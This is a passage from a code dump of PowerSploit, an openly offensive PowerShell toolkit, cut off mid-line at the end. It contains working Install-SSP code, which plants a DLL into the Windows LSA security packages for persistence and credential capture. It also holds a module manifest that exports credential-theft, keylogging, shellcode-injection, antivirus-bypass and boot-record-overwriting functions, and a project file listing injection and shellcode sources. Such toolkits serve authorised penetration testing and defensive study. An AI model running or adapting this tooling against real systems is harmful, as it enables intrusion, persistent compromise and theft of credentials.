[Byte[]] $lfanew = New-Object Byte[](4)\n\n        # Read offset to the PE Header (will be read in reverse)\n        $FileStream.Read($lfanew,0,4) | Out-Null\n        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join ''))\n\n        # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE\n        $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null\n        [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)\n\n        # Read compiled architecture\n        $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null\n        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '')\n        $FileStream.Close()\n\n        if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))\n        {\n            Throw 'Invalid PE header or unsupported architecture.'\n        }\n\n        if ($Architecture -eq '014C')\n        {\n            Write-Output '32-bit'\n        }\n        elseif ($Architecture -eq '8664')\n        {\n            Write-Output '64-bit'\n        }\n        else\n        {\n            Write-Output 'Other'\n        }\n    }\n\n    $DllArchitecture = Get-PEArchitecture $FullDllPath\n\n    $OSArch = Get-WmiObject Win32_OperatingSystem | Select-Object -ExpandProperty OSArchitecture\n\n    if ($DllArchitecture -ne $OSArch)\n    {\n        throw 'The operating system architecture must match the architecture of the SSP dll.'\n    }\n\n    $Dll = Get-Item $FullDllPath | Select-Object -ExpandProperty Name\n\n    # Get the dll filename without the extension.\n    # This will be added to the registry.\n    $DllName = $Dll | ForEach-Object { % {($_ -split '\\.')[0]} }\n\n    # Enumerate all of the currently installed SSPs\n    $SecurityPackages = Get-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' |\n        Select-Object -ExpandProperty 'Security Packages'\n\n    if ($SecurityPackages -contains $DllName)\n    {\n        throw \"'$DllName' is already present in HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages.\"\n    }\n\n    # In case you're running 32-bit PowerShell on a 64-bit OS\n    $NativeInstallDir = \"$($Env:windir)\\Sysnative\"\n\n    if (Test-Path $NativeInstallDir)\n    {\n        $InstallDir = $NativeInstallDir\n    }\n    else\n    {\n        $InstallDir = \"$($Env:windir)\\System32\"\n    }\n\n    if (Test-Path (Join-Path $InstallDir $Dll))\n    {\n        throw \"$Dll is already installed in $InstallDir.\"\n    }\n\n    # If you've made it this far, you are clear to install the SSP dll.\n    Copy-Item $FullDllPath $InstallDir\n\n    $SecurityPackages += $DllName\n\n    Set-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackages\n\n    $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')\n    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)\n    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)\n\n    $TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage',\n        'secur32.dll',\n        'Public, Static',\n        [Reflection.CallingConventions]::Standard,\n        [Int32],\n        [Type[]] @([String], [IntPtr]),\n        [Runtime.InteropServices.CallingConvention]::Winapi,\n        [Runtime.InteropServices.CharSet]::Auto)\n\n    $Secur32 = $TypeBuilder.CreateType()\n\n    if ([IntPtr]::Size -eq 4) {\n        $StructSize = 20\n    }\n    else {\n        $StructSize = 24\n    }\n\n    $StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize)\n    [Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize)\n\n    $RuntimeSuccess = $True\n\n    try {\n        $Result = $Secur32::AddSecurityPackage($DllName, $StructPtr)\n    }\n    catch {\n        $HResult = $Error[0].Exception.InnerException.HResult\n        Write-Warning \"Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))\"\n        Write-Warning \"Reason: $(([ComponentModel.Win32Exception] $HResult).Message)\"\n        $RuntimeSuccess = $False\n    }\n\n    if ($RuntimeSuccess) {\n        Write-Verbose 'Installation and loading complete!'\n    }\n    else {\n        Write-Verbose 'Installation complete! Reboot for changes to take effect.'\n    }\n}\n\nfunction Get-SecurityPackage\n{\n<#\n.SYNOPSIS\n\nEnumerates all loaded security packages (SSPs).\n\nAuthor: Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nGet-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.\nIt also parses the returned SecPkgInfo struct array.\n\n.EXAMPLE\n\nGet-SecurityPackage\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [CmdletBinding()]\n    Param()\n\n    #region P/Invoke declarations for secur32.dll\n    $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI')\n    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)\n    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI', $False)\n\n    $FlagsConstructor = [FlagsAttribute].GetConstructor(@())\n    $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())\n    $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\n    $EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])\n    $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)\n    $null = $EnumBuilder.DefineLiteral('INTEGRITY', 1)\n    $null = $EnumBuilder.DefineLiteral('PRIVACY', 2)\n    $null = $EnumBuilder.DefineLiteral('TOKEN_ONLY', 4)\n    $null = $EnumBuilder.DefineLiteral('DATAGRAM', 8)\n    $null = $EnumBuilder.DefineLiteral('CONNECTION', 0x10)\n    $null = $EnumBuilder.DefineLiteral('MULTI_REQUIRED', 0x20)\n    $null = $EnumBuilder.DefineLiteral('CLIENT_ONLY', 0x40)\n    $null = $EnumBuilder.DefineLiteral('EXTENDED_ERROR', 0x80)\n    $null = $EnumBuilder.DefineLiteral('IMPERSONATION', 0x100)\n    $null = $EnumBuilder.DefineLiteral('ACCEPT_WIN32_NAME', 0x200)\n    $null = $EnumBuilder.DefineLiteral('STREAM', 0x400)\n    $null = $EnumBuilder.DefineLiteral('NEGOTIABLE', 0x800)\n    $null = $EnumBuilder.DefineLiteral('GSS_COMPATIBLE', 0x1000)\n    $null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)\n    $null = $EnumBuilder.DefineLiteral('ASCII_BUFFERS', 0x4000)\n    $null = $EnumBuilder.DefineLiteral('FRAGMENT', 0x8000)\n    $null = $EnumBuilder.DefineLiteral('MUTUAL_AUTH', 0x10000)\n    $null = $EnumBuilder.DefineLiteral('DELEGATION', 0x20000)\n    $null = $EnumBuilder.DefineLiteral('READONLY_WITH_CHECKSUM', 0x40000)\n    $null = $EnumBuilder.DefineLiteral('RESTRICTED_TOKENS', 0x80000)\n    $null = $EnumBuilder.DefineLiteral('NEGO_EXTENDER', 0x100000)\n    $null = $EnumBuilder.DefineLiteral('NEGOTIABLE2', 0x200000)\n    $null = $EnumBuilder.DefineLiteral('APPCONTAINER_PASSTHROUGH', 0x400000)\n    $null = $EnumBuilder.DefineLiteral('APPCONTAINER_CHECKS', 0x800000)\n    $SECPKG_FLAG = $EnumBuilder.CreateType()\n\n    $TypeBuilder = $ModuleBuilder.DefineType('SSPI.SecPkgInfo', $StructAttributes, [Object], [Reflection.Emit.PackingSize]::Size8)\n    $null = $TypeBuilder.DefineField('fCapabilities', $SECPKG_FLAG, 'Public')\n    $null = $TypeBuilder.DefineField('wVersion', [Int16], 'Public')\n    $null = $TypeBuilder.DefineField('wRPCID', [Int16], 'Public')\n    $null = $TypeBuilder.DefineField('cbMaxToken', [Int32], 'Public')\n    $null = $TypeBuilder.DefineField('Name', [IntPtr], 'Public')\n    $null = $TypeBuilder.DefineField('Comment', [IntPtr], 'Public')\n    $SecPkgInfo = $TypeBuilder.CreateType()\n\n    $TypeBuilder = $ModuleBuilder.DefineType('SSPI.Secur32', 'Public, Class')\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('EnumerateSecurityPackages',\n        'secur32.dll',\n        'Public, Static',\n        [Reflection.CallingConventions]::Standard,\n        [Int32],\n        [Type[]] @([Int32].MakeByRefType(),\n            [IntPtr].MakeByRefType()),\n        [Runtime.InteropServices.CallingConvention]::Winapi,\n        [Runtime.InteropServices.CharSet]::Ansi)\n\n    $Secur32 = $TypeBuilder.CreateType()\n\n    $PackageCount = 0\n    $PackageArrayPtr = [IntPtr]::Zero\n    $Result = $Secur32::EnumerateSecurityPackages([Ref] $PackageCount, [Ref] $PackageArrayPtr)\n\n    if ($Result -ne 0)\n    {\n        throw \"Unable to enumerate seucrity packages. Error (0x$($Result.ToString('X8')))\"\n    }\n\n    if ($PackageCount -eq 0)\n    {\n        Write-Verbose 'There are no installed security packages.'\n        return\n    }\n\n    $StructAddress = $PackageArrayPtr\n\n    foreach ($i in 1..$PackageCount)\n    {\n        $SecPackageStruct = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $SecPkgInfo)\n        $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $SecPkgInfo))\n\n        $Name = $null\n\n        if ($SecPackageStruct.Name -ne [IntPtr]::Zero)\n        {\n            $Name = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($SecPackageStruct.Name)\n        }\n\n        $Comment = $null\n\n        if ($SecPackageStruct.Comment -ne [IntPtr]::Zero)\n        {\n            $Comment = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($SecPackageStruct.Comment)\n        }\n\n        $Attributes = @{\n            Name = $Name\n            Comment = $Comment\n            Capabilities = $SecPackageStruct.fCapabilities\n            MaxTokenSize = $SecPackageStruct.cbMaxToken\n        }\n\n        $SecPackage = New-Object PSObject -Property $Attributes\n        $SecPackage.PSObject.TypeNames[0] = 'SECUR32.SECPKGINFO'\n\n        $SecPackage\n    }\n}\n"
  },
  {
    "path": "Persistence/Usage.md",
    "content": "To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\n\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\n\nTo use the module, type `Import-Module Persistence`\n\nTo see the commands imported, type `Get-Command -Module Persistence`\n\nFor help on each individual command, Get-Help is your friend."
  },
  {
    "path": "PowerSploit.psd1",
    "content": "@{\n# Script module or binary module file associated with this manifest.\nModuleToProcess = 'PowerSploit.psm1'\n\n# Version number of this module.\nModuleVersion = '3.0.0.0'\n\n# ID used to uniquely identify this module\nGUID = '6753b496-d842-40a3-924a-0f09e248640c'\n\n# Author of this module\nAuthor = 'Matthew Graeber'\n\n# Copyright statement for this module\nCopyright = 'BSD 3-Clause'\n\n# Description of the functionality provided by this module\nDescription = 'PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers and red team operator during all phases of an engagement.'\n\n# Minimum version of the Windows PowerShell engine required by this module\nPowerShellVersion = '2.0'\n\n# Functions to export from this module\nFunctionsToExport = @(\n    'Add-NetUser',\n    'Add-ObjectAcl',\n    'Add-Persistence',\n    'Add-ServiceDacl',\n    'Convert-NameToSid',\n    'Convert-NT4toCanonical',\n    'Convert-SidToName',\n    'Copy-ClonedFile',\n    'Find-AVSignature',\n    'Find-ComputerField',\n    'Find-ForeignGroup',\n    'Find-ForeignUser',\n    'Find-GPOComputerAdmin',\n    'Find-GPOLocation',\n    'Find-InterestingFile',\n    'Find-LocalAdminAccess',\n    'Find-PathDLLHijack',\n    'Find-ProcessDLLHijack',\n    'Find-ManagedSecurityGroups',\n    'Find-UserField',\n    'Get-ADObject',\n    'Get-ApplicationHost',\n    'Get-CachedRDPConnection',\n    'Get-ComputerDetails',\n    'Get-ComputerProperty',\n    'Get-CurrentUserTokenGroupSid',\n    'Get-DFSshare',\n    'Get-DomainPolicy',\n    'Get-ExploitableSystem',\n    'Get-GPPPassword',\n    'Get-HttpStatus',\n    'Get-Keystrokes',\n    'Get-LastLoggedOn',\n    'Get-ModifiablePath',\n    'Get-ModifiableRegistryAutoRun',\n    'Get-ModifiableScheduledTaskFile',\n    'Get-ModifiableService',\n    'Get-ModifiableServiceFile',\n    'Get-NetComputer',\n    'Get-NetDomain',\n    'Get-NetDomainController',\n    'Get-NetDomainTrust',\n    'Get-NetFileServer',\n    'Get-NetForest',\n    'Get-NetForestCatalog',\n    'Get-NetForestDomain',\n    'Get-NetForestTrust',\n    'Get-NetGPO',\n    'Get-NetGPOGroup',\n    'Get-NetGroup',\n    'Get-NetGroupMember',\n    'Get-NetLocalGroup',\n    'Get-NetLoggedon',\n    'Get-NetOU',\n    'Get-NetProcess',\n    'Get-NetRDPSession',\n    'Get-NetSession',\n    'Get-NetShare',\n    'Get-NetSite',\n    'Get-NetSubnet',\n    'Get-NetUser',\n    'Get-ObjectAcl',\n    'Get-PathAcl',\n    'Get-Proxy',\n    'Get-RegistryAlwaysInstallElevated',\n    'Get-RegistryAutoLogon',\n    'Get-SecurityPackages',\n    'Get-ServiceDetail',\n    'Get-SiteListPassword',\n    'Get-System',\n    'Get-TimedScreenshot',\n    'Get-UnattendedInstallFile',\n    'Get-UnquotedService',\n    'Get-UserEvent',\n    'Get-UserProperty',\n    'Get-VaultCredential',\n    'Get-VolumeShadowCopy',\n    'Get-Webconfig',\n    'Install-ServiceBinary',\n    'Install-SSP',\n    'Invoke-ACLScanner',\n    'Invoke-CheckLocalAdminAccess',\n    'Invoke-CredentialInjection',\n    'Invoke-DllInjection',\n    'Invoke-EnumerateLocalAdmin',\n    'Invoke-EventHunter',\n    'Invoke-FileFinder',\n    'Invoke-MapDomainTrust',\n    'Invoke-Mimikatz',\n    'Invoke-NinjaCopy',\n    'Invoke-Portscan',\n    'Invoke-PrivescAudit',\n    'Invoke-ProcessHunter',\n    'Invoke-ReflectivePEInjection',\n    'Invoke-ReverseDnsLookup',\n    'Invoke-ServiceAbuse',\n    'Invoke-ShareFinder',\n    'Invoke-Shellcode',\n    'Invoke-TokenManipulation',\n    'Invoke-UserHunter',\n    'Invoke-WmiCommand',\n    'Mount-VolumeShadowCopy',\n    'New-ElevatedPersistenceOption',\n    'New-UserPersistenceOption',\n    'New-VolumeShadowCopy',\n    'Out-CompressedDll',\n    'Out-EncodedCommand',\n    'Out-EncryptedScript',\n    'Out-Minidump',\n    'Remove-Comments',\n    'Remove-VolumeShadowCopy',\n    'Restore-ServiceBinary',\n    'Set-ADObject',\n    'Set-CriticalProcess',\n    'Set-MacAttribute',\n    'Set-MasterBootRecord',\n    'Set-ServiceBinPath',\n    'Test-ServiceDaclPermission',\n    'Write-HijackDll',\n    'Write-ServiceBinary',\n    'Write-UserAddMSI'\n)\n\n# List of all modules packaged with this module.\nModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '3.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'},\n                @{ModuleName = 'CodeExecution'; ModuleVersion = '3.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'},\n                @{ModuleName = 'Exfiltration'; ModuleVersion = '3.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'},\n                @{ModuleName = 'Recon'; ModuleVersion = '3.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'},\n                @{ModuleName = 'ScriptModification'; ModuleVersion = '3.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'},\n                @{ModuleName = 'Persistence'; ModuleVersion = '3.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'},\n                @{ModuleName = 'PrivEsc'; ModuleVersion = '3.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'} )\n\nPrivateData = @{\n\n    PSData = @{\n\n        # Tags applied to this module. These help with module discovery in online galleries.\n        Tags = @('security','pentesting','red team','offense')\n\n        # A URL to the license for this module.\n        LicenseUri = 'http://www.apache.org/licenses/LICENSE-2.0.html'\n\n        # A URL to the main website for this project.\n        ProjectUri = 'https://github.com/PowerShellMafia/PowerSploit'\n\n    }\n\n}\n\n}\n"
  },
  {
    "path": "PowerSploit.psm1",
    "content": "Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and !('Tests','docs' -contains $_.Name) } | % { Import-Module $_.FullName -DisableNameChecking }\n"
  },
  {
    "path": "PowerSploit.pssproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup>\n    <Configuration Condition=\" '$(Configuration)' == '' \">Release</Configuration>\n    <SchemaVersion>2.0</SchemaVersion>\n    <ProjectGuid>6CAFC0C6-A428-4d30-A9F9-700E829FEA51</ProjectGuid>\n    <OutputType>Exe</OutputType>\n    <RootNamespace>PowerSploit</RootNamespace>\n    <AssemblyName>PowerSploit</AssemblyName>\n    <Name>PowerSploit</Name>\n    <ProjectHome />\n  </PropertyGroup>\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' \">\n    <DebugType>pdbonly</DebugType>\n    <Optimize>true</Optimize>\n    <OutputPath>bin\\Release\\</OutputPath>\n    <DefineConstants>TRACE</DefineConstants>\n    <ErrorReport>prompt</ErrorReport>\n    <WarningLevel>4</WarningLevel>\n  </PropertyGroup>\n  <ItemGroup>\n    <Compile Include=\"AntivirusBypass\\AntivirusBypass.psd1\" />\n    <Compile Include=\"AntivirusBypass\\AntivirusBypass.psm1\" />\n    <Compile Include=\"AntivirusBypass\\Find-AVSignature.ps1\" />\n    <Compile Include=\"AntivirusBypass\\Usage.md\" />\n    <Compile Include=\"CodeExecution\\CodeExecution.psd1\" />\n    <Compile Include=\"CodeExecution\\CodeExecution.psm1\" />\n    <Compile Include=\"CodeExecution\\Invoke-DllInjection.ps1\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection.ps1\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL.sln\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\DemoDLL.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\DemoDLL.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\DemoDLL.vcxproj\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\DemoDLL.vcxproj.filters\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\dllmain.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\ReadMe.txt\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\stdafx.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\stdafx.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\targetver.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess.sln\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess.vcxproj\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess.vcxproj.filters\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess\\dllmain.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess\\ReadMe.txt\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess\\stdafx.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess\\stdafx.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess\\targetver.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe.sln\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MDd\\DemoExe_MDd.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MDd\\DemoExe_MDd.vcxproj\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MDd\\DemoExe_MDd.vcxproj.filters\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MDd\\ReadMe.txt\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MDd\\stdafx.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MDd\\stdafx.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MDd\\targetver.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MD\\DemoExe_MD.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MD\\DemoExe_MD.vcxproj\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MD\\DemoExe_MD.vcxproj.filters\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MD\\ReadMe.txt\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MD\\stdafx.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MD\\stdafx.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MD\\targetver.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\ExeToInjectInTo.sln\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\ExeToInjectInTo\\ExeToInjectInTo.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\ExeToInjectInTo\\ExeToInjectInTo.vcxproj\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\ExeToInjectInTo\\ExeToInjectInTo.vcxproj.filters\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\ExeToInjectInTo\\ReadMe.txt\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\ExeToInjectInTo\\stdafx.cpp\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\ExeToInjectInTo\\stdafx.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\ExeToInjectInTo\\targetver.h\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\readme.txt\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\x64\\CallDllMain.asm\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\x64\\ExitThread.asm\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\x64\\GetFuncAddress.asm\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\x64\\LoadLibraryA.asm\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\x86\\CallDllMain.asm\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\x86\\ExitThread.asm\" />\n    <Compile Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\x86\\GetProcAddress.asm\" />\n    <Compile Include=\"CodeExecution\\Invoke-Shellcode.ps1\" />\n    <Compile Include=\"CodeExecution\\Invoke-WmiCommand.ps1\" />\n    <Compile Include=\"CodeExecution\\Usage.md\" />\n    <Compile Include=\"Exfiltration\\Exfiltration.psd1\" />\n    <Compile Include=\"Exfiltration\\Exfiltration.psm1\" />\n    <Compile Include=\"Exfiltration\\Get-GPPPassword.ps1\" />\n    <Compile Include=\"Exfiltration\\Get-Keystrokes.ps1\" />\n    <Compile Include=\"Exfiltration\\Get-TimedScreenshot.ps1\" />\n    <Compile Include=\"Exfiltration\\Get-VaultCredential.ps1\" />\n    <Compile Include=\"Exfiltration\\Get-VaultCredential.ps1xml\" />\n    <Compile Include=\"Exfiltration\\Invoke-CredentialInjection.ps1\" />\n    <Compile Include=\"Exfiltration\\Invoke-Mimikatz.ps1\" />\n    <Compile Include=\"Exfiltration\\Invoke-NinjaCopy.ps1\" />\n    <Compile Include=\"Exfiltration\\Invoke-TokenManipulation.ps1\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\LogonUser.sln\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\LogonUser\\LogonUser.cpp\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\LogonUser\\LogonUser.vcxproj\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\LogonUser\\LogonUser.vcxproj.filters\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\LogonUser\\ReadMe.txt\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\LogonUser\\stdafx.cpp\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\LogonUser\\stdafx.h\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\LogonUser\\targetver.h\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\logon\\dllmain.cpp\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\logon\\logon.cpp\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\logon\\logon.vcxproj\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\logon\\logon.vcxproj.filters\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\logon\\ReadMe.txt\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\logon\\stdafx.cpp\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\logon\\stdafx.h\" />\n    <Compile Include=\"Exfiltration\\LogonUser\\LogonUser\\logon\\targetver.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser.sln\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\dllmain.cpp\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\NTFS.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\NTFSParserDLL.cpp\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\NTFSParserDLL.vcxproj\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\NTFSParserDLL.vcxproj.filters\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\NTFS_Attribute.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\NTFS_Common.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\NTFS_DataType.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\NTFS_FileRecord.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\ReadMe.txt\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\stdafx.cpp\" />\n    <Compile 